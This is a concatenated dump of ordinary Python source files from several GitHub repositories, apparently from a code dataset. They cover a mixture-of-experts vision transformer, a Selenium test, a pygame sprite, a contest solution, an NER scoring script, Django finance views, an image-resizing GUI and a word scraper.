mlp_dim,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n ), # add pre layer norm?\n ]\n )\n )\n\n def forward(self, x):\n moe_losses = 0\n for attn, ff in self.layers:\n x = attn(x) + x\n ff_out, moe_loss = ff(x)\n moe_losses += moe_loss\n x = ff_out + x\n return x, moe_losses\n\n\nclass SimpleMoEViT(nn.Module):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n channels=3,\n dim_head=64,\n num_experts=4,\n k=2\n ):\n super().__init__()\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = MoETransformer(\n dim, depth, heads, dim_head, mlp_dim, num_experts, k\n )\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) 
d\") + pe\n\n x = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x)\n\n\nclass SMoEViT(pl.LightningModule):\n def __init__(\n self,\n *,\n image_size,\n patch_size,\n num_classes,\n dim,\n depth,\n heads,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n channels=3,\n dim_head=64,\n optimizer=None,\n lr=None\n ):\n super().__init__()\n self.optimizer = optimizer\n self.lr = lr\n\n image_height, image_width = pair(image_size)\n patch_height, patch_width = pair(patch_size)\n\n assert (\n image_height % patch_height == 0 and image_width % patch_width == 0\n ), \"Image dimensions must be divisible by the patch size.\"\n\n num_patches = (image_height // patch_height) * (image_width // patch_width)\n patch_dim = channels * patch_height * patch_width\n\n self.to_patch_embedding = nn.Sequential(\n Rearrange(\n \"b c (h p1) (w p2) -> b h w (p1 p2 c)\", p1=patch_height, p2=patch_width\n ),\n nn.Linear(patch_dim, dim),\n )\n\n self.transformer = SMoETransformer(\n dim,\n depth,\n heads,\n dim_head,\n mlp_dim,\n num_experts,\n noisy_gating,\n k,\n dropout,\n hidden_act,\n )\n\n self.to_latent = nn.Identity()\n self.linear_head = nn.Sequential(nn.LayerNorm(dim), nn.Linear(dim, num_classes))\n\n def forward(self, img):\n *_, h, w, dtype = *img.shape, img.dtype\n\n x = self.to_patch_embedding(img)\n pe = posemb_sincos_2d(x)\n x = rearrange(x, \"b ... d -> b (...) d\") + pe\n\n x, moe_loss = self.transformer(x)\n x = x.mean(dim=1)\n\n x = self.to_latent(x)\n return self.linear_head(x), moe_loss\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"train_loss\": loss.item(), \"train_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"val_loss\": loss.item(), \"val_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def test_step(self, batch, batch_idx):\n x, y = batch\n logits, loss = self(x)\n loss = 0.5 * loss + 0.5 * F.cross_entropy(logits, y)\n acc = cls_acc(logits, y)\n self.log_dict(\n {\"test_loss\": loss.item(), \"test_acc\": acc},\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n return loss\n\n def configure_optimizers(self):\n if self.optimizer == \"adam\":\n optimizer = torch.optim.Adam(self.parameters(), lr=self.lr)\n elif self.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(self.parameters(), lr=self.lr)\n else:\n raise ValueError(\"Optimizer not supported\")\n return optimizer\n\n\ndef init_vit_model(cfg):\n if cfg[\"model\"] == \"vit\":\n vit_model = SimpleViT(\n image_size=cfg[\"image_size\"],\n patch_size=cfg[\"patch_size\"],\n num_classes=cfg[\"nb_classes\"],\n dim=cfg[\"dim\"],\n depth=cfg[\"depth\"],\n heads=cfg[\"heads\"],\n mlp_dim=cfg[\"mlp_dim\"],\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n )\n\n elif cfg[\"model\"] == \"moe-vit\":\n vit_model = SMoEViT(\n image_size=cfg[\"image_size\"],\n patch_size=cfg[\"patch_size\"],\n num_classes=cfg[\"nb_classes\"], # // cfg['nb_tasks'],\n dim=cfg[\"dim\"],\n depth=cfg[\"depth\"],\n heads=cfg[\"heads\"],\n mlp_dim=cfg[\"mlp_dim\"],\n num_experts=cfg[\"nb_experts\"],\n k=cfg[\"k\"],\n noisy_gating=cfg[\"noisy_gating\"],\n dropout=cfg[\"dropout\"],\n 
hidden_act=cfg[\"hidden_act\"],\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n )\n\n elif cfg[\"model\"] in (\"vit-s, moe-vit-s\"):\n vit_args = dict(\n img_size=[cfg[\"image_size\"]],\n in_chans=cfg[\"in_chans\"],\n checkpoint=cfg[\"checkpoint\"],\n patch_size=cfg[\"patch_size\"],\n embed_dim=384,\n depth=cfg[\"depth\"],\n num_heads=cfg[\"heads\"],\n mlp_ratio=4,\n qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6),\n optimizer=cfg[\"opt\"],\n lr=cfg[\"lr\"],\n momentum=cfg[\"momentum\"],\n weight_decay=cfg[\"weight_decay\"],\n compute_fisher=cfg[\"compute_fisher\"],\n ewc_lambd=cfg[\"ewc_lambd\"],\n online_ewc=cfg[\"online_ewc\"],\n ewc_gamma=cfg[\"ewc_gamma\"],\n dropout=cfg[\"dropout\"],\n )\n clf_args = dict(\n num_classes=cfg[\"nb_classes\"],\n hidden_dim=cfg[\"clf_hidden_dim\"],\n clf_head=cfg[\"clf_head\"],\n individual_clf=cfg[\"individual_clf\"],\n nb_classes_per_task=cfg[\"nb_classes_per_task\"],\n distillation_tau=cfg[\"distillation_tau\"],\n freeze_clf=cfg[\"freeze_clf\"],\n base_criterion=cfg[\"base_criterion\"],\n setting=cfg[\"setting\"],\n use_head_div=cfg[\"use_head_div\"],\n head_div=cfg[\"head_div\"],\n )\n scheduler_args = dict(\n scheduler=cfg[\"scheduler\"],\n T_0=cfg[\"T_0\"],\n T_mult=cfg[\"T_mult\"],\n eta_min=cfg[\"eta_min\"],\n T_max=cfg[\"T_max\"],\n )\n if cfg[\"model\"] == \"vit-s\":\n vit_model = ViTLightning(vit_args, clf_args, scheduler_args)\n if \"moe\" in cfg[\"model\"]:\n moe_args = dict(\n num_experts=cfg[\"nb_experts\"],\n k=cfg[\"k\"],\n noisy_gating=cfg[\"noisy_gating\"],\n dropout=cfg[\"dropout\"],\n hidden_act=cfg[\"hidden_act\"],\n input_size=cfg[\"dim\"],\n hidden_size=cfg[\"mlp_dim\"],\n upcycle_ratio=cfg[\"upcycle_ratio\"],\n upcycle_order=cfg[\"upcycle_order\"],\n routing=cfg[\"routing\"],\n capacity_factor=cfg[\"capacity_factor\"],\n trainable=cfg[\"trainable\"],\n )\n if cfg[\"model\"] == \"moe-vit-s\":\n vit_model = MoEViTLightning(\n vit_args,\n moe_args,\n clf_args,\n scheduler_args,\n load_factor=cfg[\"load_factor\"],\n distill_moe=cfg[\"distill_moe\"],\n )\n elif cfg[\"model\"] == \"moe-xcit-s\":\n vit_model = MoEXCiTLightning(\n vit_args,\n moe_args,\n clf_args,\n scheduler_args,\n distill_moe=cfg[\"distill_moe\"],\n )\n else:\n raise ValueError(\"model name not found\")\n else:\n raise ValueError(\"model name not found\")\n\n return vit_model\n","repo_name":"NizarIslah/continual-SMoE","sub_path":"src/models/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":18331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70940237681","text":"__author__ = 'cromox'\n\nfrom pages.p01google.p01searchgithubcromox1 import P01SearchGitHubCromox1\nfrom utilities.teststatus import TestStatus as tStatus\nimport unittest\nimport pytest\nimport utilities.custom_logger as cl\nimport logging\nimport sys\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\", \"setUp\")\nclass P01SearchGitHubCromox1Tests(unittest.TestCase):\n log = cl.customLogger(logging.DEBUG)\n urlnow = None\n\n @pytest.fixture(autouse=True)\n def objectSetup(self):\n self.googlesearchpage = P01SearchGitHubCromox1(self.driver)\n self.tstatus = tStatus(self.driver)\n\n # @pytest.mark.run(order=1)\n @pytest.mark.tryfirst\n def test1_google_github_cromox1_page(self):\n self.log.info(\"=== >> \" + sys._getframe().f_code.co_name + \" started\")\n result = self.googlesearchpage.verifyPageURLlow(\"https://www.google.co.uk\")\n self.tstatus.mark(result, \"Currently At Google Page Verified\")\n print(\"Result \" + 
str(len(self.tstatus.resultList)) + \" = \" + str(result))\n result = self.googlesearchpage.verifyWordExistInURL('google')\n self.tstatus.mark(result, \"google word Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n self.googlesearchpage.gotoSearchArea()\n self.googlesearchpage.searchGitHubCromox1()\n self.googlesearchpage.gotoGitHubCromox1()\n result = self.googlesearchpage.verifyWordExistInURL('cromox1')\n self.tstatus.mark(result, \"GitHub cromox1 word Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1/\")\n self.__class__.urlnow = self.googlesearchpage.returnCurrentURL().rstrip('/')\n print(\"ResultLast = \" + str(result))\n self.tstatus.markFinal(\"URL GitHub cromox1 verified\", result, sys._getframe().f_code.co_name)\n\n # @pytest.mark.run(order=2)\n @pytest.mark.trylast\n def test2_github_cromox1_repo(self):\n self.log.info(\"=== >> \" + sys._getframe().f_code.co_name + \" started\")\n urlcurrent = self.__class__.urlnow\n print('CROMOX1_URL = ' + urlcurrent)\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1/\")\n self.tstatus.mark(result, \"GitHub cromox1 URL Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n self.googlesearchpage.gotosite(urlcurrent + '?tab=repositories')\n print('CURRENT URL = ' + self.googlesearchpage.returnCurrentURL())\n result = self.googlesearchpage.verifyPageURL(\"https://github.com/cromox1?tab=repositories\")\n self.tstatus.mark(result, \"GitHub cromox1 Repositories URL Verified\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n list_repo1 = self.googlesearchpage.getElementList('wb-break-all', locatorType='class')\n # print('LIST = ' + str(list_repo1))\n print('NUMBER OF REPO = ' + str(len(list_repo1)))\n result = self.googlesearchpage.verifyActualGreaterEqualExpected(len(list_repo1), 1)\n self.tstatus.mark(result, \"Repositories exist i.e. 
more than 0\")\n print(\"Result \" + str(len(self.tstatus.resultList)) + \" = \" + str(result))\n i = 1\n for element in list_repo1:\n print(str(i) + ') ' + element.text)\n i = i + 1\n # self.assertEqual(i - 1, len(list_repo1))\n result = self.googlesearchpage.verifyActualEqualExpected(i - 1, len(list_repo1))\n self.tstatus.mark(result, \"Repositories number verified\")\n print(\"ResultLast = \" + str(result))\n self.tstatus.markFinal(\"GitHub cromox1 repositories verified\", result, sys._getframe().f_code.co_name)","repo_name":"cromox1/Selenium","sub_path":"MengKome/tests/p01google/p01searchgithubcromox1_test1.py","file_name":"p01searchgithubcromox1_test1.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5312192352","text":"import pygame\nfrom pygame.sprite import Sprite\nclass Bullet(Sprite):\n \"\"\"管理发射子弹\"\"\"\n def __init__(self,screen,rocket):\n \"\"\"在火箭所在位置创建子弹\"\"\"\n super().__init__()\n self.screen=screen\n #创建子弹\n self.rect=pygame.Rect(0,0,15,5)\n self.rect.centery=rocket.rect.centery\n self.rect.right=rocket.rect.right\n self.color=60,60,60\n self.speed_factor=1\n\n def update(self):\n \"\"\"向右移动子弹\"\"\"\n self.rect.x+=self.speed_factor\n\n def draw_bullet(self):\n \"\"\"在屏幕绘制子弹\"\"\"\n pygame.draw.rect(self.screen,self.color,self.rect)\n","repo_name":"scalpelHD/Study_python","sub_path":"习题/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4428320371","text":"# 백준 문제(2021.8.3)\n# 2476번) https://www.acmicpc.net/problem/2476\n\nn = int(input())\nmax_sum = 0\nsum = 0\n\nfor i in range(n) :\n a, b, c = map(int, input().split())\n\n if(a!=b!=c) :\n sum = max(a, b, c)*100\n elif(a==b==c) :\n sum = 10000 + a*1000\n elif(a==b) :\n sum = 1000 + a*100\n elif(b==c) :\n sum = 1000 + b*100\n elif(a==c) :\n sum = 1000 + c*100\n\n if(max_sum < sum) :\n max_sum = sum\n\nprint(max_sum)\n","repo_name":"hyom72/baekjoon_study","sub_path":"Bronze3/2476.py","file_name":"2476.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15596691881","text":"import sys, json, getopt\nfrom dateutil import parser\n\ndef overlap(offsetsa, offsetsb):\n try:\n start1, end1 = offsetsa.split('_')\n start2, end2 = offsetsb.split('_')\n except ValueError:\n print(offsetsa)\n print(offsetsb)\n return not (int(end1) < int(start2) or int(end2) < int(start1))\n\ndef exact(offsetsa, offsetsb):\n try:\n start1, end1 = offsetsa.split('_')\n start2, end2 = offsetsb.split('_')\n except ValueError:\n print(offsetsa)\n print(offsetsb)\n return (int(start1) == int(start2)) and (int(end1) == int(end2))\n\n# this to ensure we get rid of derived types when loading entities (redundant otherwise)\ndef removeDerivs(annots):\n return { (a,c) for a,c in annots if c.find('derivType') < 0 }\n\ndef compareTextsOverlap(eGold, eModel):\n eGold = removeDerivs(eGold)\n eModel = removeDerivs(eModel)\n tp, fp, fn = 0, 0, 0\n for (offsets_gold, cat_gold) in eGold:\n for (offsets_model, cat_model) in eModel:\n if overlap(offsets_gold, offsets_model) and cat_gold == cat_model:\n tp += 1\n break\n fp = len(eModel) - tp\n fn = len(eGold) - tp\n return [tp, fp, fn]\n\ndef compareTextsExact(eGold, eModel):\n eGold = removeDerivs(eGold)\n eModel = removeDerivs(eModel)\n tp, fp, fn = 0, 0, 0\n for (offsets_gold, 
cat_gold) in eGold:\n for (offsets_model, cat_model) in eModel:\n if exact(offsets_gold, offsets_model) and cat_gold == cat_model:\n tp += 1\n break\n fp = len(eModel) - tp\n fn = len(eGold) - tp\n return [tp, fp, fn]\n\ndef makeAnnsFormat(inputDoc, cols, htype):\n z_anns = []\n for ben in inputDoc.split('\\n'):\n pcs = ben.split('\\t')\n try:\n if len(pcs)==cols:\n cat, ofrom, oto = pcs[-2].split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n except ValueError:\n # handling fragmented entity, two strategies:\n if htype=='merge':\n # take start and end, use as a single big entity\n cat, ofrom, ignored, oto = pcs[-2].split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n if htype=='split':\n # split into two entities\n catAndOffsets1, offsets2 = pcs[-2].split(';')\n cat, ofrom, oto = catAndOffsets1.split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] )\n ofrom, oto = offsets2.split(' ')\n z_anns.append( [ofrom+\"_\"+oto, cat] ) \n return z_anns\n\n# compute micro F1 scores for exact and overlap matches\n# htype parameter reflects two possible strategies for handling fragmented entities (\"split\" or \"merge\")\ndef computeScores(goldfile, userfile, htype=\"split\"):\n\n global_tp_ov = 0 ; global_fp_ov = 0 ; global_fn_ov = 0\n global_tp_ex = 0 ; global_fp_ex = 0 ; global_fn_ex = 0\n\n idsToAnnsUser = {}\n with open(userfile) as json_data:\n userjson = json.load(json_data)\n for nr in range(len(userjson)):\n # id = 'PCCwR-1.1-TXT/short/Inne teksty pisane/722.txt'\n if 'answers' in userjson[nr]:\n idsToAnnsUser[userjson[nr]['id']] = userjson[nr]['answers']\n else:\n idsToAnnsUser[userjson[nr]['id']] = ''\n\n found = 0;\n nonfound = 0\n\n idsToAnnsGold = {}\n with open(goldfile) as json_data:\n goldjson = json.load(json_data)\n\n for nr in range(len(goldjson['questions'])):\n idGold = '/'.join(goldjson['questions'][nr]['input']['fname'].split('/')[4:])\n # print(idGold)\n if idGold in idsToAnnsUser:\n found += 1\n # find the most recent answer:\n if len(goldjson['questions'][nr]['answers']) > 1:\n maximum = parser.parse('1900-01-02T14:22:41.439308+00:00');\n index = 0\n for i, value in enumerate(goldjson['questions'][nr]['answers']):\n value = parser.parse(goldjson['questions'][nr]['answers'][i]['created'])\n if value > maximum:\n maximum = value\n index = i\n idsToAnnsGold[idGold] = goldjson['questions'][nr]['answers'][index]['data']['brat']\n else:\n idsToAnnsGold[idGold] = goldjson['questions'][nr]['answers'][0]['data']['brat']\n\n # overlap scores:\n ovtp = compareTextsOverlap(makeAnnsFormat(idsToAnnsGold[idGold], 3, htype),\n makeAnnsFormat(idsToAnnsUser[idGold], 2, htype))\n global_tp_ov += ovtp[0]\n global_fp_ov += ovtp[1]\n global_fn_ov += ovtp[2]\n\n # exact match scores:\n extp = compareTextsExact(makeAnnsFormat(idsToAnnsGold[idGold], 3, htype),\n makeAnnsFormat(idsToAnnsUser[idGold], 2, htype))\n global_tp_ex += extp[0]\n global_fp_ex += extp[1]\n global_fn_ex += extp[2]\n\n # id not found\n else:\n nonfound += 1\n\n print(userfile)\n print(\"Nr of documents identified by ID in both data sets: \"+str(found)+\", not identified (left out): \"+str(nonfound))\n\n prec = float(global_tp_ov) / float(global_fp_ov + global_tp_ov)\n recall = float(global_tp_ov) / float(global_fn_ov + global_tp_ov)\n f1 = float(2 * prec * recall) / float(prec + recall)\n print(\"OVERLAP precision: %0.3f recall: %0.3f F1: %0.3f \" %( prec, recall, f1))\n\n prec = float(global_tp_ex) / float(global_fp_ex + global_tp_ex)\n recall = float(global_tp_ex) / float(global_fn_ex + global_tp_ex)\n f1 = float(2 * prec * 
recall) / float(prec + recall)\n print(\"EXACT precision: %0.3f recall: %0.3f F1: %0.3f \" %( prec, recall, f1))\n\n\n\n\n\ndef main(argv):\n\n goldfile = 'POLEVAL-NER_GOLD.json'\n userfile = ''\n try:\n opts, args = getopt.getopt(argv, \"g:u:h\", [\"goldfile=\", \"userfile=\"])\n except getopt.GetoptError:\n print('poleval_ner_test.py -g -u ')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print('poleval_ner_test.py -g -u ')\n sys.exit()\n elif opt in (\"-u\", \"--userfile\"):\n userfile = arg\n elif opt in (\"-g\", \"--goldfile\"):\n goldfile = arg\n\n print('gold file is: ' + goldfile)\n print('user file is: '+ userfile)\n\n computeScores(goldfile, userfile, htype=\"split\")\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"ipipan/spacy-pl","sub_path":"evaluation/ner_evaluation/poleval_ner_test.py","file_name":"poleval_ner_test.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"75"} +{"seq_id":"41917868374","text":"from genericpath import exists\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport json\nfrom datetime import date, datetime\nfrom financial_app.models.enterprise import Dividend, Enterprise, Share\nfrom . import google_finance, yahoo_finance, investing_finance\n\n\ndef home(request):\n response = {\n 'id': 1,\n 'status': 'success'\n }\n return HttpResponse(json.dumps(response), content_type=\"application/json\")\n\n\ndef enterprise(request, ticker):\n finance = json.loads(yahoo_finance.ticker(request, ticker))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=data[\"symbol\"])\n enterprise.name=data[\"longName\"]\n enterprise.description=data[\"longBusinessSummary\"]\n enterprise.sector=data[\"sector\"]\n enterprise.website=data[\"website\"]\n enterprise.logo_url=data[\"logo_url\"]\n enterprise.share_count=data[\"sharesOutstanding\"]\n enterprise.save()\n return HttpResponse(\"success udapte\")\n except Enterprise.DoesNotExist:\n enterprise = Enterprise(\n name=data[\"longName\"],\n ticker=data[\"symbol\"],\n description=data[\"longBusinessSummary\"],\n sector=data[\"sector\"],\n website=data[\"website\"],\n logo_url=data[\"logo_url\"],\n share_count=data[\"sharesOutstanding\"],\n )\n enterprise.save()\n return HttpResponse(\"success create\")\n\n\ndef dividends(request, ticker):\n finance = json.loads(yahoo_finance.dividends(request, ticker))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=ticker)\n for dividend in data:\n timestamp = dividend[\"Date\"]\n try:\n d = Dividend.objects.get(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000)\n )\n d.price = dividend[\"Dividends\"]\n d.save()\n except Dividend.DoesNotExist:\n d = Dividend(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000),\n price=dividend[\"Dividends\"]\n )\n d.save()\n return HttpResponse(\"success create\")\n except Enterprise.DoesNotExist:\n return HttpResponse(\"no enterprise\")\n\n \ndef shares(request, ticker):\n current_date = date.today().strftime(\"%Y-%m-%d\")\n finance = json.loads(yahoo_finance.prices(request, ticker, \"2022-01-01\", current_date))\n data = finance[\"data\"]\n if not data:\n return HttpResponse(\"no data\")\n try:\n enterprise = Enterprise.objects.get(ticker=ticker)\n for share in data:\n timestamp = share[\"Date\"]\n try:\n s = 
Share.objects.get(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000)\n )\n s.price = share[\"Close\"]\n s.volume = share[\"Volume\"]\n s.save()\n except Share.DoesNotExist:\n s = Share(\n enterprise=enterprise,\n date=datetime.utcfromtimestamp(timestamp/1000),\n price=share[\"Close\"],\n volume=share[\"Volume\"],\n )\n s.save()\n return HttpResponse(\"success create\")\n except Enterprise.DoesNotExist:\n return HttpResponse(\"no enterprise\")","repo_name":"ChannVincent/django_demo_3","sub_path":"financial_app/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29159946194","text":"from os import listdir\nfrom os.path import isfile, join\nimport os\nimport PySimpleGUI as sg\nfrom PIL import Image\n\n\ndef convertJPG(fnames):\n new_fnames = []\n for file_name in fnames:\n if file_name.lower().endswith(\".jpg\"):\n im1 = Image.open(file_name)\n new_file_name = file_name[:-3] + \"png\"\n im1.save(new_file_name)\n os.remove(file_name)\n new_fnames.append(new_file_name)\n else:\n new_fnames.append(file_name)\n return new_fnames\n\n\ndef resize(file_list, folder):\n for file in file_list:\n path = os.path.join(folder, file)\n if os.path.isfile(path) and file.lower().endswith((\".png\", \".jpg\")):\n img = Image.open(path)\n img = img.resize((200, 250), Image.ANTIALIAS)\n\n resized_folder = folder + \"/resized/\"\n os.makedirs(resized_folder, exist_ok=True)\n\n img.save(resized_folder + file)\n\n onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]\n for element in onlyfiles:\n if element.startswith(\"resized\"):\n os.remove(join(folder, element))\n\nfile_list_column = [\n [\n sg.Text(\"Image Folder\"),\n sg.In(size=(25, 1), enable_events=True, key=\"-FOLDER-\"),\n sg.FolderBrowse(),\n ],\n [\n sg.Listbox(\n values=[], enable_events=True, size=(40, 20),\n key=\"-FILE LIST-\"\n )\n ],\n]\n\nimage_viewer_column = [\n [sg.Text(\"Chose an image from the list on the left\")],\n [sg.Text(size=(40, 1), key=\"-TOUT-\")],\n [sg.Image(key=\"-IMAGE-\")],\n [sg.Button(button_text=\"Select\", key=\"-SELECT-\")],\n [sg.Button(button_text=\"Finish\", key=\"-FINISH-\")],\n]\n\nlayout = [\n [\n sg.Column(file_list_column),\n sg.VSeparator(),\n sg.Column(image_viewer_column),\n ]\n]\n\nwindow = sg.Window(\"Image Viewer\", layout)\n\nresized_folder = \"\"\n\nchosen_image = \"\"\nchosen_images = []\nresult = {}\n\nwhile True:\n event, values = window.read()\n if event == \"Exit\" or event == sg.WIN_CLOSED:\n break\n if event == \"-FOLDER-\":\n folder = values[\"-FOLDER-\"]\n try:\n file_list = os.listdir(folder)\n except:\n file_list = []\n\n fnames = [\n file\n for file in file_list\n if os.path.isfile(os.path.join(folder, file)) and file.lower().endswith((\".png\", \".jpg\"))\n ]\n new_fnames = convertJPG(fnames)\n\n window[\"-FILE LIST-\"].update(new_fnames)\n\n resize(file_list, folder)\n\n elif event == \"-FILE LIST-\":\n try:\n filepath = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n filepath_for_image = os.path.join(\n values[\"-FOLDER-\"] + \"/resized/\", values[\"-FILE LIST-\"][0]\n )\n window[\"-TOUT-\"].update(filepath)\n window[\"-IMAGE-\"].update(filename=filepath_for_image)\n except:\n print(\"error updating file list\")\n pass\n elif event == \"-SELECT-\":\n try:\n chosen_image = os.path.join(\n values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0]\n )\n chosen_images.append(chosen_image)\n print(\"images 
chosen so far: \", chosen_images)\n except:\n print(\"error selecting image\")\n pass\n elif event == \"-FINISH-\":\n break\n\nprint(\"images chosen so are: \", chosen_images)\nset_of_chosen_images = set(image for image in chosen_images)\nprint(len(set_of_chosen_images))\nwindow.close()\n","repo_name":"irnoz/ProjectForBachelorsDegree-SAMOSI-","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19705790624","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://www.wordcheats.com/wordlist/words-with-friends/2-letter-words\"\nreq = requests.get(url)\nsoup = BeautifulSoup(req.content, 'html.parser')\ntag = soup.find('ul', {'id': 'word-list'})\n\nchildren = tag.findChildren(\"li\" , recursive=False)\nwords = '\\n'.join([child.contents[0] for child in children])\nfile = open('scrape.out', 'w+')\nfile.write(words)\n","repo_name":"danelynnn/word_blitz_bot","sub_path":"bs.py","file_name":"bs.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11223521301","text":"\"\"\" helper function\nauthor baiyu\n\"\"\"\nimport os\nimport sys\nimport re\nimport time\nimport numpy as np\nfrom conf import settings\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import _LRScheduler\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport pickle\nfrom PIL import Image\n\nfrom sklearn.metrics import accuracy_score, classification_report\n\n\n\n\n###########################\n####### BEGIN SELF ########\n###########################\ndef leave_topk(output, k=5, fillzero=False):\n '''\n output of shape batch_size * num_classes\n '''\n num_classes = output.shape[1]\n values, index = output.topk(dim=1, k=k, largest=True, sorted=True)\n onehot_index = F.one_hot(index, num_classes=num_classes).sum(dim=1).bool()\n index = torch.sort(index, dim=1)[0]\n values = torch.gather(output, dim=1, index=index)\n if fillzero:\n output1 = torch.zeros_like(output)\n else:\n fill_values = (1-values.sum(dim=1))/(num_classes - k)\n output1 = fill_values.reshape(-1, 1).expand(output.shape[0], output.shape[1]).clone()\n output1[onehot_index] = values.reshape(-1)\n return output1\n\ndef shannon_entropy(X):\n '''\n X of shape: n*m.\n '''\n return - torch.sum(torch.log(X)*X, dim=1)\n\ndef fast_load_model(name, folder, num_classes, device, model_file='model.pth', norm_mean=(0, 0, 0), norm_std=(1, 1, 1), return_path=False):\n '''\n auxillary function for fast model loading, and combine the model with training standarization mean and std.\n '''\n path = \"./checkpoint/{}/{}/\".format(name, folder)\n net = get_network(name, False, num_classes=num_classes).to(device) \n net.load_state_dict(torch.load(path + model_file, map_location=device))\n net.eval()\n net = nn.Sequential(transforms.Normalize(norm_mean, norm_std), net)\n if return_path:\n return net, path\n return net\n\n\ndef evaluate_net(net, test_loader, device):\n '''\n similar to the next one.\n '''\n net.eval()\n correct_1 = 0.0\n correct_5 = 0.0\n\n with torch.no_grad():\n for n_iter, (image, label) in enumerate(test_loader):\n # print(\"iteration: {}\\ttotal {} iterations\".format(n_iter + 1, len(test_loader)))\n image = 
